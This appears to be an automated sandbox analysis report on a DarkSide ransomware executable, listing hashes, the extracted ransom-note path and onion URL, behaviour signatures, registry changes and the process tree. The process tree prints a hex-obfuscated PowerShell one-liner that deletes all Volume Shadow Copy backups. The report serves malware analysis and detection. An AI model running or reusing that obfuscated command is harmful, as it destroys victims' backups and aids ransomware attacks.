Analysis
-
max time kernel
131s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 12:32
Static task
static1
Behavioral task
behavioral1
Sample
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
Resource
win10v2004-20240508-en
General
-
Target
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
-
Size
260KB
-
MD5
5a1dfcf340060e11fd97775f08cc707d
-
SHA1
ca7ba09b986c4c7c8590a2b90215785bef2efb41
-
SHA256
762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3
-
SHA512
9aae78da9f1c81ff671f721322031a2f12fefc3afaa90d5434a300f23775b568ed0129b629ec1910bb8345af64ff0b72f256c8f26377a5e6e527ddf5c81658b3
-
SSDEEP
6144:+GuWNCix6AcxVBkerhbzfpZUU6wpKBWrl8mQEy:uOCix6JPzVhSwN58mty
Malware Config
Extracted
C:\Users\Admin\README.47262cb1.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (150) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\47262cb1.BMP" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\47262cb1.BMP" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\Desktop\WallpaperStyle = "10" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\47262cb1 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\47262cb1\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\47262cb1.ico" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.47262cb1 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.47262cb1\ = "47262cb1" 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\47262cb1\DefaultIcon 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3572 powershell.exe 3572 powershell.exe 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSecurityPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeTakeOwnershipPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeLoadDriverPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSystemProfilePrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSystemtimePrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeProfSingleProcessPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeIncBasePriorityPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeCreatePagefilePrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeBackupPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeRestorePrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeShutdownPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeDebugPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeSystemEnvironmentPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeRemoteShutdownPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeUndockPrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeManageVolumePrivilege 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 33 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 34 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 35 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: 36 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeBackupPrivilege 3592 vssvc.exe Token: SeRestorePrivilege 3592 vssvc.exe Token: SeAuditPrivilege 3592 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3600 wrote to memory of 3572 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe 97 PID 3600 wrote to memory of 3572 3600 762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe 97 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe"C:\Users\Admin\AppData\Local\Temp\762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3592
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5c321ce5c529b0b756ad69a719371d600
SHA1abf615e98069e732169cb9b56d8b7b58067bd4ec
SHA2569ac27c4257a90651a2ff2b6fdf448c47a1893bc5c44b6c06c3715c56ff36a0f6
SHA5128a465b2ab7d61aa3ecfdb8f4fec1e4241230f1c71172c202bb5742a340195346dbe30d6e868dda3e3bb66fd658e6cfb17a44e6780ee9463d7b880f8d00ec8bf6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf